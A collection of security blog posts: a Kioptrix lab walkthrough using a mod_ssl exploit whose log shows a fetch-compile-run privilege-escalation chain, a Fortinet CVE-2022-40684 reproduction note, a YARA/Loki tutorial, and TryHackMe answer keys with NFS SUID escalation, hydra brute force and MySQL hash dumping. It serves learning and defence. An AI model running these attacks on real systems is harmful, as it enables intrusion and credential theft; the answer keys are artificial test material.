S-1-5-21-4157223341-3243572438-1405127623-546 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-547 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-548 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-549 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-550 KIOPTRIX\unix_group.2147483423 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1004 KIOPTRIX\daemon (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1011 KIOPTRIX\tty (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX\halt (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1021 KIOPTRIX\wheel (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1027 KIOPTRIX\news (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1037 KIOPTRIX\unix_group.18 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1040 KIOPTRIX\unix_user.20 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1043 KIOPTRIX\slocate (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local User)

 ============================================= 
|    Getting printer info for 10.10.10.131    |
 ============================================= 
No printers returned.


enum4linux complete on Tue Nov  1 23:44:39 2022

This might be interesting:

Also we can use nbtscan for samba service:


Doing NBT name scan for addresses from 10.10.10.131

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
10.10.10.131     KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00

So far we have gathered basic information as follows:

ip 10.10.10.131
port 22,80,443,139,111
apache version 1.3.20
mod_ssl version 2.8.4
openssl version 0.9.6b
http method GET,HEAD,OPTIONS,TRACE
OS type redhat
kernel version Linux 2.4.9 - 2.4.18

Exploitation

I will first dig deeper into the mod_ssl remote buffer overflow vulnerability, since it may get a remote shell.

The related CVE number is CVE-2002-0082.

Google it:

Open the second one:

We use the above exploit script.

It couldn’t be compiled:

I found an updated one in the comment:

Try this one:

Compiled successfully.

Exploiting:


└─$ ./OpenFuck 0x6b 10.10.10.131 443 -c 40                                                   1 ⨯

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--23:42:55--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ whoami
whoami
apache

It appears that I’m not root.

What could go wrong?

When I check the output message again, during the exploit process it tried to connect to the url https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c but failed, and then tried to execute the script ./exploit which could not be found.

So I think the url is used to download that exploit script, and that script is for privilege escalation.

To verify my thought, I checked the source code and it contains the following lines:

After gaining access to the system, it downloads the script, compile it and execute it.

I’m going to fix this exploit script. Here’s what I thought. I’m going to download the exploit file by hand and put it on the attacker vm(my kali linux), and then after I run openfuck again, I download it from kali, execute it by hand on the target vm.

After getting shell, downloading exploit script from kali:

Compiling:

Exploiting:

Nailed it! I’m root now.

We can also pretiffy the shell.

Google it:

Try python tty:

It looks like not working.

Try another one:

Ok, this is it.

CVE-2022-40684漏洞复现

概述

CVE-2022-40684漏洞为近期Fortinet官方披露的高危漏洞。

攻击者可以通过Fortinet api向Fortinet设备注入ssh公钥,并让设备认为该公钥是属于admin账号的,以此获取管理员登录权限。

影响范围

FortiOS versions 5.x, 6.x are NOT impacted.

FortiOS version 7.2.0 through 7.2.1

FortiOS version 7.0.0 through 7.0.6

FortiProxy version 7.2.0

FortiProxy version 7.0.0 through 7.0.6

FortiSwitchManager version 7.2.0

FortiSwitchManager version 7.0.0

漏洞复现

开始攻击:

攻击截图

SSH公钥成功添加到防火墙中。

用ssh工具登录,登录方式选择本地私钥:

攻击截图

无需输入密码即登录成功。

检查是否被入侵

搜索日志:user=”Local_Process_Access”  

修复方法

升级到如下版本:

Please upgrade to FortiOS version 7.2.2 or above

Please upgrade to FortiOS version 7.0.7 or above

Please upgrade to FortiProxy version 7.2.1 or above

Please upgrade to FortiProxy version 7.0.7 or above

Please upgrade to FortiSwitchManager version 7.2.1 or above

Please upgrade to FortiOS version 7.0.5 B8001 or above for FG6000F, 7000E/F series platforms

对于受该漏洞影响的设备固件版本,就算开放了http相关端口,攻击者只是能注入ssh密钥,但登录还需要连接ssh端口。

所以只要ssh不暴露到公网,还是暂时安全的,当然最好是按官方建议升级到对应版本。

参考资料

官方漏洞说明: https://www.fortiguard.com/psirt/FG-IR-22-377 Exp脚本: https://github.com/horizon3ai/CVE-2022-40684

基于yara的恶意软件分析

Yara简介

yara是一个用于检测恶意软件的开源工具,由VirusTotal研发。 其原理是基于模式匹配的。通过创建规则文件,文件中包含具体的检测规则,用来检测恶意软件包含的字符串等特征,比如恶意软件的sha256 hash值,IOC域名/IP,hex值(16进制)等。

世界范围内当前主流杀毒软件的恶意软件分析引擎几乎都集成了支持yara的工具,比如我们熟知的趋势,virusTotal,McAfee,Tenable,Cisco, Avast, Fortinet等。

完整列表请查阅:https://github.com/VirusTotal/yara

但是只使用yara来编写规则的工作量会非常巨大,所以由此衍生出一些基于yara的恶意软件扫描器。其中比较主流的有Loki,Thor Lite和Thor。前两款是免费开源,最后一个是收费的。上述工具均由Florian Roth开发,另外该作者维护了一个叫valhalla的公开的yara规则库(也是威胁情报平台), 可用于搜索有关恶意软件的yara规则及威胁情报。

另外yarGen这个工具可以用来生成自定义的yara规则。

总的来说就是,yara是最基础的单位,.yar文件里面可以写各种检测规则。Loki和Thor是基于yara开发的恶意软件扫描器,内置很多.yar文件(里面包含各种各样的规则)。当你遇到一个不在规则库中的恶意文件,需要针对特定恶意软件自定义规则时,yarGen可用于自动生成这些规则。

这里再分享一个yara工具的资源合集,有兴趣可以看看:GitHub - InQuest/awesome-yara: A curated list of awesome YARA rules, tools, and people.

所有工具的安装过程略,自行查阅github。

Yara规则创建

yara的规则文件以.yar结尾。 下面看一个示例的规则文件,内容如下:

yara_rule

  • rule后面跟规则名称
  • strings用于设置字符串变量,这里设置了小写和大写的hello
  • condition是条件判断,any of them表示匹配上面任意一个字符串就触发规则(表示检测到了)

详细的yara规则配置教程请查阅官方文档:Writing YARA rules — yara 4.2.0 documentation

Yara扫描示例

首先创建三个文件,其中test.yar是yara规则文件,另两个是纯文本文件,内容分别包含首字母大写的Hello和全大写的HELLO。

test.yar内容如下:

意思是只有匹配Hello的才检测成功。

下面我们来实际验证一下。 yara的使用语法如下:

yara <.yar规则文件> <需检测的可疑文件>

连续运行两次,结果如下:

可看到,第一次检测全大写的HELLO.txt没有任何输出,表示没检测到。 而第二次的输出表示,由test_hello规则检测出来,恶意文件为Hello.txt。

Loki扫描示例

Loki主要有以下四个功能:

  • 文件名IOC检查
  • Yara规则检查
  • 哈希值检查
  • C2回连检查

loki下载地址:Releases · Neo23x0/Loki · GitHub

实验环境需要安装:

  • Python3
  • Yara
  • Loki
  • yarGen 另外需要准备一个webshell恶意文件,这里使用一个名为b374k的php webshell,请自行去github搜索下载(下载index.php文件即可)。

安装完成后,需要先运行这个命令更新loki的yara规则库:

python3 loki.py --update # 更新后会在loki安装路径下新增signature-base目录

由于国内的网络环境所致,大概率会更新失败。这里提供另一个方法。

直接下载这个项目 https://github.com/Neo23x0/signature-base 然后解压到Loki的目录中,把解压后的目录名改成signature-base即可。

执行检测的命令只有一条,即:

python3 loki.py -p . # 切换到可疑文件所在目录,执行命令。-p是指定目录。

现在对php webshell文件进行检测:

结果显示ALERT,表示确认是恶意软件。图中列出了文件的hash值,匹配了哪条检测规则,检测结果为detected(检测到了)。

使用yarGen创建Yara规则

假设你收到一封钓鱼邮件,该邮件携带一封疑似恶意软件的.htm附件。虽然你使用Loki并未查出任何异常,但是当你分析其源代码时发现,该htm附件确认系恶意文件。此时你需要做的就是针对该恶意文件,生成新的yara规则文件,此时yarGen就派上用场了。

yarGen会分析恶意文件内容中的字符串,由于yarGen内置了一个庞大的字符串数据库,里面存储了大量存在于正常软件中的字符串,把这些正常的字符串与恶意文件内容中的字符串作对比,去除恶意文件中正常的字符串,剩下的就是疑似恶意的字符串,基于此生成新的yara检测规则。

跟Loki一样,使用前先更新一下:

python3 yarGen.py --update

生成新规则:

python3 yarGen.py -m /home/kali/suspicious-files/file2 --excludegood -o /home/kali/suspicious-files/file2.yar

其中:

  1. -m 指定恶意软件存储的路径。这里需要特别注意,经实测,该目录下最好是只放一个恶意文件样本,如果放多个,生成的检测规则可能会很不准确。
  2. –excludegood 表示去除无害的字符串
  3. -o 指定规则文件保存的路径

实际操作的截图:

生成后的规则可以使用yara直接运行:

yara new.yar malware

或者把新的规则文件挪到Loki程序目录的signature-base/yara路径下,然后使用Loki执行检测即可。

实际工作中我会遇到一些杀毒软件检测不出来的恶意文件(比如0day病毒),但是通过分析源码或者其它方式确信这就是恶意软件,那么我就会使用这种自定义生成规则的方式,更新loki的yara规则。以后遇到此类软件,都会自动识别为恶意。

Valhalla介绍

Valhalla平台由开发loki和thor的作者Florian Roth维护,可以在该网站上查询某个技术的关键字,搜索对应yara规则。 或者查询已知恶意软件的哈希值,也可以检索出对应规则(如果有的话)。

主页:https://valhalla.nextron-systems.com/

可以搜索phishing,结果会显示跟钓鱼邮件有关的规则,规则旁边有描述,以及virusTotal的病毒样本,有些还会关联MITRE ATT&CK知识库。

搜索恶意软件的哈希值:

另外如果能在该平台上检索出恶意软件对应规则,但本地实验环境上检测不出恶意行为,就表示本地的规则库该更新了。

Nessus Room Writeup

TryHackMe: Nessus Room Writeup

Learn how to set up and use Nessus, a popular vulnerability scanner.

Task 3

What is the name of the button which is used to launch a scan?

New Scan

What side menu option allows us to create custom templates?

Policies

What menu allows us to change plugin properties such as hiding them or changing their severity?

Plugin Rules

In the ‘Scan Templates’ section after clicking on ‘New Scan’, what scan allows us to see simply what hosts are alive?

Host Discovery

One of the most useful scan types, which is considered to be ‘suitable for any host’?

Basic Network Scan

What scan allows you to ‘Authenticate to hosts and enumerate missing updates’?

Credentialed Patch Audit

What scan is specifically used for scanning Web Applications?

Web Application Tests

Task 4

Create a new ‘Basic Network Scan’ targeting the deployed VM. What option can we set under ‘BASIC’ (on the left) to set a time for this scan to run? This can be very useful when network congestion is an issue.

Schedule

Under ‘DISCOVERY’ (on the left) set the ‘Scan Type’ to cover ports 1-65535. What is this type called?

Port scan (all ports)

What ‘Scan Type’ can we change to under ‘ADVANCED’ for lower bandwidth connection?

Scan low bandwidth links

After the scan completes, which ‘Vulnerability’ in the ‘Port scanners’ family can we view the details of to see the open ports on this host?

Nessus SYN scanner

What Apache HTTP Server Version is reported by Nessus?

There might be some confusion here that I must mention. In the below picture we see the apache version is 2.4.25, but that is not the correct answer. You need to wait until the scan finishes or the vulerability named ‘Apache HTTP Server Version’ showes up in the panel. And here below is the true answer:

2.4.99

Task 5

What is the plugin id of the plugin that determines the HTTP server type and version?

10107

What authentication page is discovered by the scanner that transmits credentials in cleartext?

login.php

What is the file extension of the config backup?

To find the config backup you can look up the vulnerabilities including information about some URL paths, and then visit those paths to check if there’re any backup files available.

But here there’s also a medium severity vulnerability showing up, so you can just open it and see the result:

.bak

Which directory contains example documents? (This will be in a php directory)

/external/phpids/0.6/docs/examples/

What vulnerability is this application susceptible to that is associated with X-Frame-Options?

Clickjacking

Active Directory Basics Room Writeup

TryHackMe: Active Directory Basics Room Writeup

Learn the basics of Active Directory and how it is used in the real world today

Task 2

What database does the AD DS contain?

NTDS.dit

Where is the NTDS.dit stored?

%SystemRoot%\NTDS

What type of machine can be a domain controller?

windows server

Task 3

What is the term for a hierarchy of domains in a network?

tree

What is the term for the rules for object creation?

Domain Schema

What is the term for containers for groups, computers, users, printers, and other OUs?

Organization Units

Task 4

Which type of groups specify user permissions?

Security Groups

Which group contains all workstations and servers joined to the domain?

Domain Computers

Which group can publish certificates to the directory?

Cert Publishers

Which user can make changes to a local machine but not to a domain controller?

Local Administrators

Which group has their passwords replicated to read-only domain controllers?

Allowed RODC Password Replication Group

Task 5

What type of trust flows from a trusting domain to a trusted domain?

Directional

What type of trusts expands to include other trusted domains?

Transitive

Task 6

What type of authentication uses tickets?

Kerberos

What domain service can create, validate, and revoke public key certificates?

Certificate Services

Task 7

What is the Azure AD equivalent of LDAP?

Rest APIs

What is the Azure AD equivalent of Domains and Forests?

Tenants

What is the Windows Server AD equivalent of Guests?

Trusts

Task 8

Before we dive in to the answers, we need to set up PowerView first. PowerView is a Powershell tool for gaining network information on Windows Domains.

cd Downloads
powershell -ep bypass  # Use 'powershell -ep bypass' to open a powershell shell without being checked by the execution policy.
. .\PowerView.ps1  # Import PowerView script

Check the PowerView cheatsheet here.

What is the name of the Windows 10 operating system?

Windows 10 Enterprise Evaluation

What is the second “Admin” name?

Admin2

Which group has a capital “V” in the group name?

You can get help to see the examples of a specific command:

Here in the above picture:

  1. where-object is a filter
  2. -cmatch is followed by a case sensitive regex

    Hyper-V Administrators

When was the password last set for the SQLService user?

5/13/2020 8:26:58

Windows Fundamentals 1 Room Writeup

TryHackMe: Windows Fundamentals 1 Room Writeup

In part 1 of the Windows Fundamentals module, we’ll start our journey learning about the Windows desktop, the NTFS file system, UAC, the Control Panel, and more..

Task 2

What encryption can you enable on Pro that you can’t enable in Home?

BitLocker

Task 3

Which selection will hide/disable the Search box?

Hidden

Which selection will hide/disable the Task View button?

show task view button

Besides Clock and Network, what other icon is visible in the Notification Area?

On the bottom right-handed corner, right-click the icon and you can see “Open Action Center”.

action center

Task 4

What is the meaning of NTFS?

New Technology File System

Task 5

What is the system variable for the Windows folder?

%windir%

Task 6

What is the name of the other user account?

Type ‘lusrmgr.msc’ to see local users:

tryhackmebilly

What groups is this user a member of?

Check its properties:

Remote Desktop Users,Users

What built-in account is for guest access to the computer?

Guest

What is the account status?

Check its properties and you can tell the account is disabled:

account is disabled

Task 7

What does UAC mean?

User Account Control

Task 8

In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?

windows defender firewall

Task 9

What is the keyboard shortcut to open Task Manager?

Ctrl+Shift+Esc

Wireshark 101 Room Writeup

TryHackMe: Wireshark 101 Room Writeup

Learn the basics of Wireshark and how to analyze various protocols and PCAPs

Task 7

What is the Opcode for Packet 6?

request(1)

What is the source MAC Address of Packet 19?

80:fb:06:f0:45:d7

What 4 packets are Reply packets?

use this display filter:

arp.opcode == 2

and the result is here:

76,400,459,520

What IP Address is at 80:fb:06:f0:45:d7?

Below you can see the MAC address is paired with IP 10.251.23.1:

10.251.23.1

Task 8

What is the type for packet 4?

8

What is the type for packet 5?

0

What is the timestamp for packet 12, only including month day and year?

note: Wireshark bases it’s time off of your devices time zone, if your answer is wrong try one day more or less.

In the above picture you can see that the timestamp is May 31, 2013, but it’s based on my timezone, which is in China. So the answer may be shifted one day back or forth.

May 30, 2013

What is the full data string for packet 18?

Unfold the data panel and copy the value:

08090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637

Task 10

What is being queried in packet 1?

Copy and paste the query value:

8.8.8.8.in-addr.arpa

What site is being queried in packet 26?

www.wireshark.org

What is the Transaction ID for packet 26?

Transaction ID is the identifier chosen by the client when it’s sending a question to the server. The server then will responds along with that ID.

0x2c58

Task 11

What percent of packets originate from Domain Name System?

Go to Statistics - Protocol Hierarchy:

4.7

What endpoint ends in .237?

Go to Statistics - Endpoints:

145.254.160.237

What is the user-agent listed in packet 4?

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113

Looking at the data stream what is the full request URI from packet 18?

http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http%3A%2F%2Fwww.ethereal.com%2Fdownload.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633

What domain name was requested from packet 38?

www.ethereal.com

Looking at the data stream what is the full request URI from packet 38?

Refer to the above image for the URI.

http://www.ethereal.com/download.html

Task 12

Before doing the answers, we need to setting up the RSA key to decrypt the HTTPS data.

Go to Edit > Preferences > Protocols > TLS > RSA keys list, fill in the blanks as below:

Looking at the data stream what is the full request URI for packet 31?

https://localhost/icons/apache_pb.png

Looking at the data stream what is the full request URI for packet 50?

https://localhost/icons/back.gif

What is the User-Agent listed in packet 50?

Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2

Network Services 2 Room Writeup

TryHackMe: Network Services 2 Room Writeup

Enumerating and Exploiting More Common Network Services & Misconfigurations

Task 2

What does NFS stand for?

Network File System

What process allows an NFS client to interact with a remote directory as though it was a physical device?

mounting

What does NFS use to represent files and directories on the server?

file handle

What protocol does NFS use to communicate between the server and client?

RPC

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

user ID / group ID

Can a Windows NFS server share files with a Linux client? (Y/N)

Y

Can a Linux NFS server share files with a MacOS client? (Y/N)

Y

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

4.2

Task 3

Conduct a thorough port scan scan of your choosing, how many ports are open?

In practice, when you use nmap to scan a huge range of ports, it can take really a long time. So instead of setting up a huge port range, we can divide it into several ranges to make the scanning time short.

nmap -A -p1-10000 10.10.186.1
nmap -A -p10001-20000 10.10.186.1
nmap -A -p20001-30000 10.10.186.1
nmap -A -p30001-40000 10.10.186.1
nmap -A -p40001-50000 10.10.186.1

7

Which port contains the service we’re looking to enumerate?

2049

Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

showmount -e 10.10.186.1

/home

Change directory to where you mounted the share- what is the name of the folder inside?

mkdir /tmp/mount
mount -t nfs 10.10.186.1:/home /tmp/mount/ -nolock
cd /tmp/mount/
ls

cappucino

Which of these folders could contain keys that would give us remote access to the server?

.ssh

Which of these keys is most useful to us?

id_rsa

**Can we log into the machine using *ssh -i @* ? (Y/N)**

cp id_rsa ~
cd ~
chmod 600 id_rsa
ssh -i id_rsa cappucino@10.10.186.1

Y

Task 4

Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using “sudo chmod +[permission] bash”. What letter do we use to set the SUID bit set using chmod?

chmod +s bash

s

Let’s do a sanity check, let’s check the permissions of the “bash” executable using “ls -la bash”. What does the permission set look like? Make sure that it ends with -sr-x.

chmod +x bash
ls -la bash

rwsr-sr-x

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with “./bash -p”. The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

ssh -i id_rsa cappucino@10.10.186.1
./bash -p

Now we have entered into a root shell.

No answer needed

Great! If all’s gone well you should have a shell as root! What’s the root flag?

Change to root home directory, then you can find a text file containing the flag.

cd /root
cat root.txt

THM{nfs_got_pwned}

Task 5

What does SMTP stand for?

Simple Mail Transfer Protocol

What does SMTP handle the sending of? (answer in plural)

emails

What is the first step in the SMTP process?

SMTP handshake

What is the default SMTP port?

25

Where does the SMTP server send the email if the recipient’s server is not available?

SMTP queue

On what server does the Email ultimately end up on?

POP/IMAP

Can a Linux machine run an SMTP server? (Y/N)

Y

Can a Windows machine run an SMTP server? (Y/N)

Y

Task 6

First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

nmap -A -p1-10000 10.10.59.93

25

Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

If you would like some more help, or practice using, Metasploit, Darkstar has an amazing room on Metasploit that you can check out here:

https://tryhackme.com/room/rpmetasploit

msfconsole

msfconsole

Let’s search for the module “smtp_version”, what’s it’s full module name?

search smtp_version

auxiliary/scanner/smtp/smtp_version

Great, now- select the module and list the options. How do we do this?

options auxiliary/scanner/smtp/smtp_version

options

Have a look through the options, does everything seem correct? What is the option we need to set?

RHOSTS

Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

set RHOSTS 10.10.59.93
use auxiliary/scanner/smtp/smtp_version
exploit

polosmtp.home

What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

Postfix

Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum”, what’s it’s full module name?

search smtp_enum

auxiliary/scanner/smtp/smtp_enum

We’re going to be using the “top-usernames-shortlist.txt” wordlist from the Usernames subsection of seclists (/usr/share/wordlists/SecLists/Usernames if you have it installed).

Seclists is an amazing collection of wordlists. If you’re running Kali or Parrot you can install seclists with: “sudo apt install seclists” Alternatively, you can download the repository from here.

What option do we need to set to the wordlist’s path?

options auxiliary/scanner/smtp/smtp_enum
set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

USER_FILE

Once we’ve set this option, what is the other essential paramater we need to set?

set RHOSTS 10.10.59.93

RHOSTS

Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

use auxiliary/scanner/smtp/smtp_enum
exploit

No answer needed

Okay! Now that’s finished, what username is returned?

administrator

Task 7

What is the password of the user we found during our enumeration stage?

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.59.93 ssh

alejandro

Great! Now, let’s SSH into the server as the user, what is contents of smtp.txt

ssh administrator@10.10.59.93
cat smtp.txt

THM{who_knew_email_servers_were_c00l?}

Task 8

What type of software is MySQL?

relational database management system

What language is MySQL based on?

SQL

What communication model does MySQL use?

client-server

What is a common application of MySQL?

back end database

What major social network uses MySQL as their back-end database? This will require further research.

This question mentions social network, so what first came into my mind was facebook, and the answer sure is facebook.

facebook

Task 9

As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?

nmap -A -p1-10000 10.10.118.254

3306

Good, now- we think we have a set of credentials. Let’s double check that by manually connecting to the MySQL server. We can do this using the command “mysql -h [IP] -u [username] -p

apt install default-mysql-client
mysql -h 10.10.118.254 -u root -p

No answer needed

We’re going to be using the “mysql_sql” module.

Search for, select and list the options it needs. What three options do we need to set? (in descending order).

msfconsole
search mysql_sql
options auxiliary/admin/mysql/mysql_sql

PASSWORD/username/RHOSTS

Run the exploit. By default it will test with the “select version()” command, what result does this give you?

set PASSWORD password
set username root
set RHOSTS 10.10.118.254
use auxiliary/admin/mysql/mysql_sql
exploit

5.7.29-0ubuntu0.18.04.1

Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the “sql” option to “show databases”. how many databases are returned?

set SQL show databases
exploit

4

Task 10

First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?

search mysql_schemadump

auxiliary/scanner/mysql/mysql_schemadump

Great! Now, you’ve done this a few times by now so I’ll let you take it from here. Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?

use auxiliary/scanner/mysql/mysql_schemadump
exploit

x$waits_global_by_latency

Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the “mysql_hashdump” module. What’s the module’s full name?

search mysql_hashdump

auxiliary/scanner/mysql/mysql_hashdump

Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

use auxiliary/scanner/mysql/mysql_hashdump
exploit

carl

Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called “hash.txt”.

What is the user/hash combination string?

carl:*EA031893AA21444B170FC2162A56978B8CEECE18

Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?

john hash.txt

doggie

Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?

What’s the contents of MySQL.txt

ssh carl@10.10.118.254
ls
cat MySQL.txt

THM{congratulations_you_got_the_mySQL_flag}

Fortigate防火墙阻挡恶意ip对设备发起的请求

描述

攻击者会向Fortigate防火墙的公网地址发起请求,比如试图与设备建立IPSec VPN连接。 可以使用local-in-policy策略对公网接口进行过滤,拒绝入向的恶意的ip发来的流量。

配置示例
config firewall local-in-policy
    edit 0
        set intf "port2"
        set srcaddr "attackers"
        set dstaddr "all"
        set service "ALL"
        set schedule "always"
    next
end

这样就阻挡了attackers组的源ip向port2接口发起的入站流量。